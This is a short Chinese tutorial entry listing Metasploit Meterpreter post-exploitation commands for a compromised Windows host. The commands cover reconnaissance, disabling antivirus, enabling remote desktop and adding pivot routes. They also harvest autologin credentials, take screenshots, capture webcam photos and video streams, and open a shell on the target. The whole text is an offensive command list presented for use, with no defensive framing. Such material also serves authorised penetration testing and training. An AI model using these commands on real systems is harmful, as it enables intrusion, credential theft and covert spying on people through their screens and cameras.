37. Metasploit后渗透攻击：Meterpreter系统命令

1.查看系统信息

命令: sysinfo

2.查看是否为虚拟机

命令：run post/windows/gather/checkvm

3.查看运行时间

命令：idletime

4.查看完整网络配置

命令：route

5.查看当前权限

命令：getuid

6.关闭杀毒软件

命令：run post/windows/manage/killav

7.启动远程桌面

命令：run post/windows/manage/enable_rdp

8.查看网络结构

命令：run post/windows/manage/autoroute

9.添加路由

先输入background命令，将当前Meterpreter终端隐藏在后台，然后route add 命令添加路由，添加路由后输入route print命令查看

10.列举当前登录的用户

命令： run post/windows/gather/enum_logged_on_users

11.列举应用程序

命令：run post/windows/gather/enum_applications

12.抓取自动登录的用户名和密码

命令：run post/windows/gather/credentials/windows_autologin

13.抓取目标机的屏幕截图

首选使用扩展插件Espia，使用前要先输入load espia命令加载该插件，然后输入screengrab命令就可以抓取此时目标机的屏幕截图
输入screenshot也可以达到同样的效果

14.查看目标机是否有摄像头

命令：webcam_list

15.抓取摄像头的照片

命令：webcam_snap

16.抓取视频

命令：webcam_stream
查看抓取的视频：使用浏览器打开给出的地址即可

17.进入目标机的shell

命令：shell